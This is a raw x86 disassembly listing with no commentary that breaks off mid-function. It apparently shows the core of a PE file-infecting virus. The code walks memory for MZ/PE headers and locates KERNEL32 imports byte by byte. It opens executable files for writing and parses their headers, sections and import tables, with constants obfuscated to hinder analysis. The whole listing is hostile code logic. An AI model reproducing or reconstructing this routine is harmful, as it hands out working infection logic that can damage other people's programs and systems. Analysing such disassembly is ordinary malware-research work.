sub esp, 138h
push ebx
push esi
push edi
lea eax, ds:10007C0Ah
mov [ebp-10h], eax
mov edx, eax
movsx ecx, word ptr ds:10013160h
add ecx, 0Fh
mov eax, edx
shr eax, cl
movsx edx, word ptr ds:10013124h
add edx, 0Ah
mov ecx, edx
mov ebx, eax
shl ebx, cl
loc_420C80: ; CODE XREF: .data:00420C98�j
; .data:00420CC8�j ...
mov [ebp-18h], ebx
mov eax, ebx
cmp word ptr [eax], 5A4Dh
jz short loc_420C9A
mov eax, ds:10013188h
add eax, 10000h
sub ebx, eax
jmp short loc_420C80
; ---------------------------------------------------------------------------
loc_420C9A: ; CODE XREF: .data:00420C8A�j
mov eax, ds:1001315Ch
add eax, 2Dh
add eax, ds:10013288h
mov esi, ebx
add esi, eax
mov eax, ebx
add eax, [esi]
mov [ebp-14h], eax
mov ecx, [ebp-10h]
cmp eax, ecx
jbe short loc_420CCA
movsx eax, word ptr ds:100130E8h
add eax, 0FFFFh
sub ebx, eax
jmp short loc_420C80
; ---------------------------------------------------------------------------
loc_420CCA: ; CODE XREF: .data:00420CB8�j
mov eax, [ebp-14h]
mov [ebp-8], eax
movzx eax, word ptr [eax]
cmp eax, 4550h
jz short loc_420CEA
movsx eax, word ptr ds:10013218h
add eax, 0FFFBh
sub ebx, eax
jmp short loc_420C80
; ---------------------------------------------------------------------------
loc_420CEA: ; CODE XREF: .data:00420CD8�j
mov eax, [ebp-8]
mov eax, [eax+80h]
mov [ebp-0Ch], eax
movsx eax, word ptr ds:10013174h
sub eax, 7
mov [ebp-4], eax
jmp loc_420E87
; ---------------------------------------------------------------------------
loc_420D08: ; CODE XREF: .data:00420E93�j
mov eax, ebx
add eax, [ebp-0Ch]
add eax, [ebp-4]
mov [ebp-12Ch], eax
mov edx, ds:1001312Ch
movsx ecx, word ptr ds:10013180h
add edx, ecx
sub edx, 0Ch
cmp [eax], edx
jz loc_420E99
mov eax, [ebp-12Ch]
mov edx, ebx
add edx, [eax+0Ch]
mov [ebp-130h], edx
push edx
lea eax, [ebp-127h]
push eax
call sub_423399
mov eax, ds:100131ACh
add eax, ds:10013164h
sub eax, 9
mov [ebp-28h], eax
jmp short loc_420D83
; ---------------------------------------------------------------------------
loc_420D61: ; CODE XREF: .data:00420DA2�j
mov eax, [ebp-28h]
mov al, [ebp+eax-127h]
cmp al, 61h
jle short loc_420D80
cmp al, 7Ah
jge short loc_420D80
mov eax, [ebp-28h]
lea eax, [ebp+eax-127h]
sub byte ptr [eax], 20h
loc_420D80: ; CODE XREF: .data:00420D6D�j
; .data:00420D71�j
inc dword ptr [ebp-28h]
loc_420D83: ; CODE XREF: .data:00420D5F�j
mov eax, [ebp-28h]
movsx eax, byte ptr [ebp+eax-127h]
mov edx, ds:10013164h
movsx ecx, word ptr ds:100131B4h
add edx, ecx
sub edx, 8
cmp eax, edx
jnz short loc_420D61
mov eax, ds:10013120h
movsx edx, word ptr ds:100130CCh
add eax, edx
cmp byte ptr [ebp+eax-133h], 4Bh
jnz loc_420E83
mov eax, ds:1001309Ch
cmp byte ptr [ebp+eax-12Bh], 45h
jnz loc_420E83
mov eax, ds:100130ECh
cmp byte ptr [ebp+eax-129h], 52h
jnz loc_420E83
mov eax, ds:10013138h
cmp byte ptr [ebp+eax-122h], 4Ch
jnz loc_420E83
mov eax, ds:100131F8h
cmp byte ptr [ebp+eax-124h], 33h
jnz short loc_420E83
mov eax, ds:10013210h
add eax, 4
add eax, ds:100131A8h
cmp byte ptr [ebp+eax-127h], 32h
jnz short loc_420E83
mov eax, [ebp-12Ch]
mov edx, ebx
add edx, [eax+10h]
mov [ebp-138h], edx
mov eax, ds:10013204h
dec eax
mov [ebp-134h], eax
loc_420E3D: ; CODE XREF: .data:00420E7F�j
mov eax, [ebp-138h]
mov esi, eax
add esi, [ebp-134h]
mov edi, [esi]
mov eax, ds:10013198h
sub eax, 2
cmp edi, eax
jz short loc_420E99
push edi
call sub_41A9D0
pop ecx
cmp dword ptr ds:10013294h, 0
jnz short loc_420E99
movsx eax, word ptr ds:10013130h
add eax, ds:10013110h
sub eax, 4
add [ebp-134h], eax
jmp short loc_420E3D
; ---------------------------------------------------------------------------
db 0EBh, 16h
; ---------------------------------------------------------------------------
loc_420E83: ; CODE XREF: .data:00420DBA�j
; .data:00420DCD�j ...
add dword ptr [ebp-4], 14h
loc_420E87: ; CODE XREF: .data:00420D03�j
mov eax, [ebp-8]
mov eax, [eax+84h]
cmp [ebp-4], eax
jb loc_420D08
loc_420E99: ; CODE XREF: .data:00420D2A�j
; .data:00420E57�j ...
cmp dword ptr ds:10013294h, 0
jz short loc_420EFA
call sub_41A512
call sub_41F36F
call sub_419B03
mov edx, eax
mov [ebp-19h], dl
movzx eax, byte ptr [ebp-19h]
mov edx, ds:10013140h
add edx, ds:10013204h
sub edx, 8
cmp eax, edx
jz short loc_420EFA
lea eax, [ebp-24h]
push eax
mov eax, ds:100131BCh
add eax, ds:100130ACh
sub eax, 0Ah
push eax
lea eax, [ebp-20h]
push eax
push 10007C0Ah
mov eax, ds:10013110h
sub eax, 5
push eax
push 0
call dword ptr ds:10012B90h
loc_420EFA: ; CODE XREF: .data:00420EA0�j
; .data:00420ECB�j
pop edi
pop esi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420EFF proc near ; CODE XREF: sub_41D465+CD�p
; sub_41D465+122�p
var_7 = byte ptr -7
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
push ecx
push eax
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
mov ebx, [ebp+arg_4]
mov byte ptr [ebx], 0
mov ecx, esi
or eax, 0FFFFFFFFh
loc_420F15: ; CODE XREF: sub_420EFF+1B�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_420F15
mov [ebp+var_4], eax
mov edi, ds:100131D4h
sub edi, 2
jmp short loc_420F9A
; ---------------------------------------------------------------------------
loc_420F2A: ; CODE XREF: sub_420EFF+9E�j
movzx eax, [ebp+arg_8]
cmp edi, eax
jb short loc_420F3D
mov al, [esi+edi]
cmp al, 2Fh
jz short loc_420F3D
cmp al, 2Eh
jnz short loc_420F5C
loc_420F3D: ; CODE XREF: sub_420EFF+31�j
; sub_420EFF+38�j
push 10013878h
call sub_41C914
movzx edx, byte ptr [esi+edi]
push edx
push eax
lea edx, [ebp+var_7]
push edx
call dword ptr ds:10012634h
add esp, 10h
jmp short loc_420F8B
; ---------------------------------------------------------------------------
loc_420F5C: ; CODE XREF: sub_420EFF+3C�j
push 10013873h
call sub_41C914
push eax
push ebx
call dword ptr ds:1000D020h
push 1001386Bh
call sub_41C914
movzx edx, byte ptr [esi+edi]
push edx
push eax
lea edx, [ebp+var_7]
push edx
call dword ptr ds:10012634h
add esp, 1Ch
loc_420F8B: ; CODE XREF: sub_420EFF+5B�j
lea eax, [ebp+var_7]
push eax
push ebx
call dword ptr ds:1000D020h
add esp, 8
inc edi
loc_420F9A: ; CODE XREF: sub_420EFF+29�j
cmp edi, [ebp+var_4]
jb short loc_420F2A
pop edi
pop esi
pop ebx
leave
retn
sub_420EFF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420FA4 proc near ; CODE XREF: sub_419F88+188�p
var_170 = byte ptr -170h
var_16C = dword ptr -16Ch
var_168 = byte ptr -168h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 170h
push ebx
push esi
push edi
push 104h
lea eax, [ebp+var_104]
push eax
call dword ptr ds:1000F600h
lea eax, [ebp+var_168]
push eax
call sub_41FC67
push 10013866h
call sub_41C914
push eax
lea esi, [ebp+var_104]
push esi
call dword ptr ds:1000D020h
lea eax, [ebp+var_168]
push eax
lea eax, [ebp+var_104]
push eax
call dword ptr ds:1000D020h
push 1001385Eh
call sub_41C914
push eax
lea esi, [ebp+var_104]
push esi
call dword ptr ds:1000D020h
add esp, 24h
push 0
mov eax, ds:100130F0h
add eax, ds:10013158h
sub eax, 0Ah
push eax
push 3
push 0
mov eax, ds:100131E8h
add eax, ds:100130D4h
sub eax, 7
push eax
push 80000000h
lea eax, [ebp+var_104]
push eax
call dword ptr ds:10012788h
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_42106B
mov eax, ds:10013268h
sub eax, 4
mov edx, [ebp+arg_0]
mov ecx, ds:10013288h
sub ecx, 6
mov [edx+eax], cl
jmp short loc_4210D8
; ---------------------------------------------------------------------------
loc_42106B: ; CODE XREF: sub_420FA4+AC�j
push 0
push 0
push [ebp+arg_4]
push edi
call dword ptr ds:10012B9Ch
push 0
lea eax, [ebp+var_170]
push eax
mov eax, ds:10013194h
add eax, 0Bh
push eax
push [ebp+arg_0]
push edi
call dword ptr ds:1000D028h
mov [ebp+var_16C], eax
push edi
call dword ptr ds:10011654h
mov eax, ds:100130F8h
add eax, ds:10013234h
sub eax, 0Bh
cmp [ebp+var_16C], eax
jnz short loc_4210D8
mov eax, ds:100131A8h
sub eax, 2
mov edx, [ebp+arg_0]
mov ecx, ds:1001309Ch
movsx ebx, word ptr ds:100130BCh
add ecx, ebx
sub ecx, 0Eh
mov [edx+eax], cl
loc_4210D8: ; CODE XREF: sub_420FA4+C5�j
; sub_420FA4+112�j
pop edi
pop esi
pop ebx
leave
retn
sub_420FA4 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov esi, [ebp+0Ch]
mov edi, [ebp+10h]
push 10014AC8h
push esi
call dword ptr ds:10012648h
or eax, eax
jz short loc_421109
mov eax, [ebp+8]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_421151
; ---------------------------------------------------------------------------
loc_421109: ; CODE XREF: .data:004210F7�j
push 10014A48h
push esi
call dword ptr ds:10012648h
or eax, eax
jz short loc_421129
mov eax, [ebp+8]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_421151
; ---------------------------------------------------------------------------
loc_421129: ; CODE XREF: .data:00421117�j
push 10014A28h
push esi
call dword ptr ds:10012648h
or eax, eax
jz short loc_421149
mov eax, [ebp+8]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_421151
; ---------------------------------------------------------------------------
loc_421149: ; CODE XREF: .data:00421137�j
and dword ptr [edi], 0
mov eax, 80004002h
loc_421151: ; CODE XREF: .data:00421107�j
; .data:00421127�j ...
pop edi
pop esi
pop ebx
pop ebp
retn 0Ch
; =============== S U B R O U T I N E =======================================
sub_421158 proc near ; CODE XREF: .data:0041F037�p
push edi
push 10013853h
call sub_41C914
pop ecx
push eax
call dword ptr ds:1000F5E8h
mov ds:100132ACh, eax
test eax, eax
jnz short loc_42118B
push 10013848h
call sub_41C914
pop ecx
push eax
call dword ptr ds:10010244h
mov ds:100132ACh, eax
loc_42118B: ; CODE XREF: sub_421158+1A�j
cmp dword ptr ds:100132ACh, 0
jz short loc_4211B1
push 10013832h
call sub_41C914
pop ecx
push eax
push dword ptr ds:100132ACh
call dword ptr ds:1000F1F8h
mov ds:1000F604h, eax
loc_4211B1: ; CODE XREF: sub_421158+3A�j
pop edi
retn
sub_421158 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4211B3 proc near ; CODE XREF: sub_41B354+11B�p
var_270 = byte ptr -270h
var_26C = dword ptr -26Ch
var_267 = byte ptr -267h
var_203 = byte ptr -203h
var_104 = byte ptr -104h
push ebp
mov ebp, esp
sub esp, 270h
push esi
push edi
push 104h
lea eax, [ebp+var_104]
push eax
call dword ptr ds:1000F600h
lea eax, [ebp+var_267]
push eax
call sub_41FC67
push 1001382Dh
call sub_41C914
push eax
lea esi, [ebp+var_104]
push esi
call dword ptr ds:1000D020h
lea eax, [ebp+var_267]
push eax
lea eax, [ebp+var_104]
push eax
call dword ptr ds:1000D020h
push 10013825h
call sub_41C914
push eax
lea esi, [ebp+var_104]
push esi
call dword ptr ds:1000D020h
add esp, 24h
push 0
mov eax, ds:10013154h
add eax, ds:100131F8h
sub eax, 0Ah
push eax
push 3
push 0
mov eax, ds:100131E8h
dec eax
push eax
push 80000000h
lea eax, [ebp+var_104]
push eax
call dword ptr ds:10012788h
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_42125F
mov eax, 2Ah
jmp short loc_4212CA
; ---------------------------------------------------------------------------
loc_42125F: ; CODE XREF: sub_4211B3+A3�j
push 0
lea eax, [ebp+var_270]
push eax
push 0FFh
lea eax, [ebp+var_203]
push eax
push edi
call dword ptr ds:1000D028h
mov [ebp+var_26C], eax
push edi
call dword ptr ds:10011654h
mov eax, ds:100131A0h
sub eax, 3
cmp [ebp+var_26C], eax
jnz short loc_42129F
mov eax, 2Ah
jmp short loc_4212CA
; ---------------------------------------------------------------------------
loc_42129F: ; CODE XREF: sub_4211B3+E3�j
movzx eax, [ebp+var_203]
movsx edx, word ptr ds:10013098h
movsx ecx, word ptr ds:10013174h
lea edx, [edx+ecx+18h]
cmp eax, edx
jge short loc_4212C3
mov eax, 2Ah
jmp short loc_4212CA
; ---------------------------------------------------------------------------
loc_4212C3: ; CODE XREF: sub_4211B3+107�j
movzx eax, [ebp+var_203]
loc_4212CA: ; CODE XREF: sub_4211B3+AA�j
; sub_4211B3+EA�j ...
pop edi
pop esi
leave
retn
sub_4211B3 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, ds:100130F4h
sub eax, 7
cmp ds:10012BA8h, eax
jbe short loc_4212EC
push 10012BA8h
call dword ptr ds:1000D010h
loc_4212EC: ; CODE XREF: .data:004212DF�j
mov eax, ds:10012BA8h
pop ebp
retn 4
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push edi
mov edi, [ebp+0Ch]
mov eax, [ebp+18h]
mov [ebp+18h], ax
movsx eax, word ptr ds:1001324Ch
mov edx, ds:100130B4h
lea eax, [eax+edx+0E9h]
cmp edi, eax
jnz short loc_421328
push dword ptr [ebp+1Ch]
call sub_418999
pop ecx
xor eax, eax
jmp short loc_42134E
; ---------------------------------------------------------------------------
loc_421328: ; CODE XREF: .data:00421319�j
mov eax, ds:100130B4h
add eax, 0F5h
add eax, ds:1001314Ch
cmp edi, eax
jnz short loc_421349
push dword ptr [ebp+1Ch]
call sub_41AD81
pop ecx
xor eax, eax
jmp short loc_42134E
; ---------------------------------------------------------------------------
loc_421349: ; CODE XREF: .data:0042133A�j
mov eax, 80020003h
loc_42134E: ; CODE XREF: .data:00421326�j
; .data:00421347�j
pop edi
pop ebp
retn 24h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421353 proc near ; CODE XREF: sub_4206A9+1D0�p
var_32014 = byte ptr -32014h
var_32011 = byte ptr -32011h
var_32010 = dword ptr -32010h
var_3200C = dword ptr -3200Ch
var_32007 = byte ptr -32007h
var_32006 = byte ptr -32006h
var_31F58 = dword ptr -31F58h
var_31F54 = dword ptr -31F54h
var_31F50 = dword ptr -31F50h
var_31F4C = dword ptr -31F4Ch
var_31F48 = dword ptr -31F48h
var_31F44 = dword ptr -31F44h
var_31F40 = dword ptr -31F40h
var_31F3C = dword ptr -31F3Ch
var_31F38 = dword ptr -31F38h
var_31F34 = dword ptr -31F34h
var_31F30 = dword ptr -31F30h
var_31F2C = dword ptr -31F2Ch
var_31F28 = dword ptr -31F28h
var_31F24 = dword ptr -31F24h
var_31F20 = dword ptr -31F20h
var_31F1C = dword ptr -31F1Ch
var_31F18 = dword ptr -31F18h
var_31F14 = dword ptr -31F14h
var_31F10 = dword ptr -31F10h
var_31F0C = dword ptr -31F0Ch
var_31F08 = dword ptr -31F08h
var_31F04 = dword ptr -31F04h
var_31F00 = dword ptr -31F00h
var_31EFC = dword ptr -31EFCh
var_31EF8 = dword ptr -31EF8h
var_31EF4 = dword ptr -31EF4h
var_31EF0 = dword ptr -31EF0h
var_31EEC = dword ptr -31EECh
var_31EE8 = dword ptr -31EE8h
var_31EE4 = dword ptr -31EE4h
var_31EE0 = dword ptr -31EE0h
var_31EDC = dword ptr -31EDCh
var_31ED8 = dword ptr -31ED8h
var_31ED4 = byte ptr -31ED4h
var_31EC7 = byte ptr -31EC7h
var_1194 = dword ptr -1194h
var_1190 = dword ptr -1190h
var_118C = dword ptr -118Ch
var_1188 = dword ptr -1188h
var_1184 = dword ptr -1184h
var_1180 = dword ptr -1180h
var_117C = dword ptr -117Ch
var_1178 = dword ptr -1178h
var_1174 = dword ptr -1174h
var_116F = byte ptr -116Fh
var_1070 = dword ptr -1070h
var_106C = dword ptr -106Ch
var_1068 = dword ptr -1068h
var_1064 = dword ptr -1064h
var_1060 = dword ptr -1060h
var_105C = dword ptr -105Ch
var_1058 = dword ptr -1058h
var_1054 = dword ptr -1054h
var_1050 = dword ptr -1050h
var_C54 = dword ptr -0C54h
var_C50 = dword ptr -0C50h
var_C4C = dword ptr -0C4Ch
var_850 = dword ptr -850h
var_84C = dword ptr -84Ch
var_848 = dword ptr -848h
var_844 = dword ptr -844h
var_840 = dword ptr -840h
var_83C = dword ptr -83Ch
var_440 = dword ptr -440h
var_43C = dword ptr -43Ch
var_438 = dword ptr -438h
var_434 = dword ptr -434h
var_430 = dword ptr -430h
var_42C = dword ptr -42Ch
var_428 = dword ptr -428h
var_424 = dword ptr -424h
var_420 = dword ptr -420h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, 32010h
call sub_423379
push ebx
push esi
push edi
push [ebp+arg_8]
push [ebp+arg_4]
lea eax, [ebp+var_31EC7]
push eax
call dword ptr ds:10011638h
add esp, 0Ch
push 0
mov eax, ds:1001309Ch
sub eax, 5
push eax
push 3
push 0
mov eax, ds:10013234h
add eax, ds:10013284h
sub eax, 0Dh
push eax
push 0C0000001h
push [ebp+arg_0]
call dword ptr ds:10012788h
mov [ebp+var_1070], eax
cmp eax, 0FFFFFFFFh
jnz short loc_4213B7
xor eax, eax
jmp loc_422846
; ---------------------------------------------------------------------------
loc_4213B7: ; CODE XREF: sub_421353+5B�j
push 0
push [ebp+var_1070]
call dword ptr ds:10012624h
mov [ebp+var_10], eax
mov edx, [ebp+arg_8]
lea eax, [eax+edx+1FFFFh]
push eax
push 0
call dword ptr ds:1000FA34h
mov [ebp+var_4], eax
push 0
lea eax, [ebp+var_31EDC]
push eax
push [ebp+var_10]
push [ebp+var_4]
push [ebp+var_1070]
call dword ptr ds:1000D028h
mov eax, [ebp+var_4]
mov eax, [eax+3Ch]
mov [ebp+var_840], eax
mov eax, [ebp+var_31EDC]
sub eax, 0F8h
cmp [ebp+var_840], eax
ja loc_42282F
mov eax, [ebp+var_840]
add eax, [ebp+var_4]
mov [ebp+var_8], eax
movzx eax, word ptr [eax]
cmp eax, 4550h
jnz loc_42282F
mov eax, [ebp+var_8]
movzx eax, word ptr [eax+5Ch]
movsx edx, word ptr ds:100130CCh
sub edx, 6
cmp eax, edx
jz loc_42282F
and [ebp+var_1180], 0
mov eax, [ebp+var_8]
movzx edx, word ptr [eax+44h]
mov ecx, ds:10013238h
add ecx, 7
add ecx, ds:100130D4h
cmp edx, ecx
jnz short loc_4214B2
mov edx, ds:100130C4h
inc edx
mov [eax+1Ah], dl
cmp dl, 0
jz short loc_4214B2
movzx eax, word ptr [eax+46h]
mov [ebp+var_31EEC], eax
movsx eax, word ptr ds:1001322Ch
movsx edx, word ptr ds:100130FCh
add eax, edx
sub eax, 0Bh
cmp [ebp+var_31EEC], eax
jnb loc_42282F
mov [ebp+var_1180], 1
loc_4214B2: ; CODE XREF: sub_421353+11B�j
; sub_421353+12A�j
cmp [ebp+var_1180], 0
jz short loc_4214D3
mov eax, [ebp+var_8]
add eax, 6
movzx edx, word ptr [eax]
movsx ecx, word ptr ds:100130C0h
add ecx, 2
sub edx, ecx
mov [eax], dx
loc_4214D3: ; CODE XREF: sub_421353+166�j
mov eax, [ebp+var_8]
mov eax, [eax+80h]
mov [ebp+var_430], eax
mov eax, 28h
mov [ebp+var_31EEC], eax
mov edx, [ebp+var_8]
mov [ebp+var_31EF4], edx
mov ecx, [ebp+var_840]
add ecx, 0F8h
mov [ebp+var_31EF0], eax
movzx edi, word ptr [edx+6]
mul edi
mov [ebp+var_31EF8], eax
mov edx, ecx
add edx, eax
mov [ebp+var_31F00], edx
mov eax, [ebp+var_31EEC]
mov [ebp+var_31EFC], eax
mov ecx, ds:100130B8h
movsx edi, word ptr ds:10013240h
add ecx, edi
dec ecx
mul ecx
mov [ebp+var_31F04], eax
mov eax, [ebp+var_31F00]
mov edx, [ebp+var_31F04]
add eax, edx
mov edx, [ebp+var_31EF4]
add eax, [edx+0D4h]
cmp eax, [edx+54h]
ja loc_42282F
mov eax, ds:10013128h
movsx edx, word ptr ds:100131E0h
add eax, edx
sub eax, 0Ch
mov [ebp+var_20], eax
movsx eax, word ptr ds:10013260h
add eax, ds:100131B0h
sub eax, 9
mov [ebp+var_C54], eax
mov eax, ds:10013238h
mov [ebp+var_105C], eax
mov eax, ds:100131D8h
movsx edx, word ptr ds:10013208h
add eax, edx
sub eax, 0Eh
mov [ebp+var_434], eax
jmp loc_421678
; ---------------------------------------------------------------------------
loc_4215B6: ; CODE XREF: sub_421353+332�j
mov eax, 28h
mul [ebp+var_434]
mov [ebp+var_31F10], eax
mov eax, [ebp+var_840]
mov edx, [ebp+var_4]
lea eax, [eax+edx+0F8h]
mov edx, [ebp+var_31F10]
mov esi, edx
add esi, eax
mov eax, [esi+0Ch]
add eax, [esi+8]
mov [ebp+var_31F08], eax
mov eax, [esi+14h]
add eax, [esi+10h]
mov [ebp+var_31F0C], eax
mov eax, [ebp+var_20]
cmp [ebp+var_31F08], eax
jbe short loc_42160D
mov eax, [ebp+var_31F08]
mov [ebp+var_20], eax
loc_42160D: ; CODE XREF: sub_421353+2AF�j
mov eax, [ebp+var_C54]
cmp [ebp+var_31F0C], eax
jbe short loc_421627
mov eax, [ebp+var_31F0C]
mov [ebp+var_C54], eax
loc_421627: ; CODE XREF: sub_421353+2C6�j
mov eax, [ebp+var_8]
mov eax, [eax+0A8h]
cmp eax, [esi+0Ch]
jb short loc_421652
cmp eax, [ebp+var_31F08]
jnb short loc_421652
mov eax, [esi+14h]
mov edx, [ebp+var_8]
add eax, [edx+0A8h]
sub eax, [esi+0Ch]
mov [ebp+var_105C], eax
loc_421652: ; CODE XREF: sub_421353+2E0�j
; sub_421353+2E8�j
mov eax, [ebp+var_430]
mov edx, [esi+0Ch]
cmp eax, edx
jb short loc_421672
add edx, [esi+8]
cmp eax, edx
jnb short loc_421672
sub eax, [esi+0Ch]
add eax, [esi+14h]
mov [ebp+var_844], eax
loc_421672: ; CODE XREF: sub_421353+30A�j
; sub_421353+311�j
inc [ebp+var_434]
loc_421678: ; CODE XREF: sub_421353+25E�j
mov eax, [ebp+var_8]
movzx eax, word ptr [eax+6]
cmp [ebp+var_434], eax
jb loc_4215B6
mov eax, ds:1001318Ch
add eax, 1000h
push eax
push [ebp+var_20]
call sub_41D094
add esp, 8
mov [ebp+var_20], eax
cmp [ebp+var_1180], 0
jz short loc_4216B6
mov eax, [ebp+var_C54]
mov [ebp+var_10], eax
loc_4216B6: ; CODE XREF: sub_421353+358�j
mov eax, [ebp+var_C54]
cmp [ebp+var_10], eax
jz short loc_4216D9
mov eax, [ebp+var_8]
mov edx, ds:100130C4h
sub edx, 7
cmp [eax+0A8h], edx
jz loc_42282F
loc_4216D9: ; CODE XREF: sub_421353+36C�j
mov eax, ds:100130F8h
sub eax, 7
cmp [ebp+var_105C], eax
jz loc_4217B8
mov eax, ds:10013280h
add eax, ds:1001314Ch
sub eax, 0Ah
mov [ebp+var_31F10], eax
mov eax, ds:10013194h
sub eax, 9
mov [ebp+var_31F08], eax
jmp short loc_42175F
; ---------------------------------------------------------------------------
loc_421711: ; CODE XREF: sub_421353+432�j
mov eax, [ebp+var_105C]
mov [ebp+var_31F14], eax
mov eax, 1Ch
mul [ebp+var_31F08]
mov [ebp+var_31F18], eax
mov eax, [ebp+var_31F14]
mov edx, [ebp+var_31F18]
add eax, edx
add eax, [ebp+var_4]
mov [ebp+var_31F0C], eax
mov edx, [ebp+var_31F10]
cmp [eax+18h], edx
jbe short loc_421759
mov eax, [eax+18h]
mov [ebp+var_31F10], eax
loc_421759: ; CODE XREF: sub_421353+3FB�j
inc [ebp+var_31F08]
loc_42175F: ; CODE XREF: sub_421353+3BC�j
mov edi, [ebp+var_8]
mov eax, [edi+0ACh]
mov ecx, 1Ch
shr eax, 2
mov edx, 24924925h
mul edx
mov [ebp+var_31F14], edx
mov edi, edx
cmp [ebp+var_31F08], edi
jb short loc_421711
mov eax, [ebp+var_8]
push dword ptr [eax+3Ch]
push [ebp+var_31F10]
call sub_41D094
add esp, 8
mov [ebp+var_31F10], eax
mov eax, [ebp+var_C54]
cmp eax, [ebp+var_10]
jz short loc_4217B8
cmp [ebp+var_31F10], eax
jnz loc_42282F
loc_4217B8: ; CODE XREF: sub_421353+394�j
; sub_421353+457�j
and [ebp+var_1174], 0
mov eax, ds:10013188h
mov [ebp+var_438], eax
jmp loc_421912
; ---------------------------------------------------------------------------
loc_4217CF: ; CODE XREF: sub_421353+5CE�j
mov eax, [ebp+var_844]
add eax, [ebp+var_438]
add eax, [ebp+var_4]
mov [ebp+var_3200C], eax
mov edx, ds:100130ECh
sub edx, 4
cmp [eax], edx
jz loc_421927
mov eax, [ebp+var_3200C]
mov eax, [eax+0Ch]
sub eax, [ebp+var_430]
add eax, [ebp+var_844]
mov [ebp+var_32010], eax
add eax, [ebp+var_4]
push eax
lea eax, [ebp+var_32007]
push eax
call dword ptr ds:1000F1F4h
add esp, 8
mov eax, ds:100130C8h
mov [ebp+var_31F08], eax
jmp short loc_42185C
; ---------------------------------------------------------------------------
loc_421831: ; CODE XREF: sub_421353+52C�j
mov eax, [ebp+var_31F08]
mov al, [ebp+eax+var_32007]
cmp al, 61h
jle short loc_421856
cmp al, 7Ah
jge short loc_421856
mov eax, [ebp+var_31F08]
lea eax, [ebp+eax+var_32007]
sub byte ptr [eax], 20h
loc_421856: ; CODE XREF: sub_421353+4ED�j
; sub_421353+4F1�j
inc [ebp+var_31F08]
loc_42185C: ; CODE XREF: sub_421353+4DC�j
mov eax, [ebp+var_31F08]
movsx eax, [ebp+eax+var_32007]
movsx edx, word ptr ds:10013104h
movsx ecx, word ptr ds:100130A4h
add edx, ecx
sub edx, 0Eh
cmp eax, edx
jnz short loc_421831
movsx eax, word ptr ds:100130FCh
movsx edx, word ptr ds:100130B0h
add eax, edx
cmp [ebp+eax+var_32014], 4Bh
jnz short loc_42190B
movsx eax, word ptr ds:10013160h
movsx edx, word ptr ds:1001327Ch
add eax, edx
cmp byte ptr [ebp+eax+var_3200C+1], 45h
jnz short loc_42190B
mov eax, ds:10013204h
cmp [ebp+eax+var_32006], 52h
jnz short loc_42190B
mov eax, ds:1001312Ch
mov edx, ds:1001317Ch
add edx, eax
cmp byte ptr [ebp+edx+var_32010+1], 4Ch
jnz short loc_42190B
mov edx, ds:100131F4h
add edx, ds:10013234h
cmp byte ptr [ebp+edx+var_3200C+3], 33h
jnz short loc_42190B
add eax, ds:10013158h
cmp [ebp+eax+var_32011], 32h
jnz short loc_42190B
mov [ebp+var_1174], 1
loc_42190B: ; CODE XREF: sub_421353+546�j
; sub_421353+560�j ...
add [ebp+var_438], 14h
loc_421912: ; CODE XREF: sub_421353+477�j
mov eax, [ebp+var_8]
mov eax, [eax+84h]
cmp [ebp+var_438], eax
jb loc_4217CF
loc_421927: ; CODE XREF: sub_421353+49C�j
cmp [ebp+var_1174], 0
jz loc_42282F
lea eax, [ebp+var_31EC7]
mov [ebp+var_42C], eax
mov eax, [eax+3Ch]
mov [ebp+var_84C], eax
add eax, [ebp+var_42C]
mov [ebp+var_848], eax
cmp [ebp+var_1180], 0
jnz loc_421AFB
mov eax, [ebp+var_8]
mov [ebp+var_31F08], eax
mov edx, ds:100131ACh
sub edx, 5
cmp [eax+0D0h], edx
jz loc_421AFB
mov edx, [eax+0D4h]
mov [ebp+var_31F0C], edx
mov ecx, ds:1001311Ch
movsx edi, word ptr ds:10013218h
add ecx, edi
sub ecx, 0Ah
cmp edx, ecx
jz loc_421AFB
mov ecx, 28h
mov edi, [ebp+var_840]
add edi, 0F8h
mov eax, ecx
mov edx, [ebp+var_31F08]
movzx edx, word ptr [edx+6]
mov [ebp+var_31F10], edx
mul edx
mov [ebp+var_31F14], eax
mov edx, edi
add edx, eax
mov [ebp+var_31F1C], edx
mov eax, ecx
mov [ebp+var_31F18], eax
mov ecx, ds:10013138h
add ecx, 4
mul ecx
mov [ebp+var_31F20], eax
mov eax, [ebp+var_31F1C]
mov edx, [ebp+var_31F20]
add eax, edx
mov edx, [ebp+var_31F0C]
add eax, edx
mov edx, [ebp+var_31F08]
cmp [edx+54h], eax
jbe loc_421AFB
mov eax, [ebp+var_840]
add eax, 0F8h
mov [ebp+var_31F2C], eax
mov eax, 28h
mov ecx, [ebp+var_8]
movzx ecx, word ptr [ecx+6]
mul ecx
mov [ebp+var_31F30], eax
mov eax, [ebp+var_31F2C]
mov edx, [ebp+var_31F30]
add eax, edx
mov [ebp+var_31F24], eax
mov [ebp+var_31F34], eax
mov eax, 28h
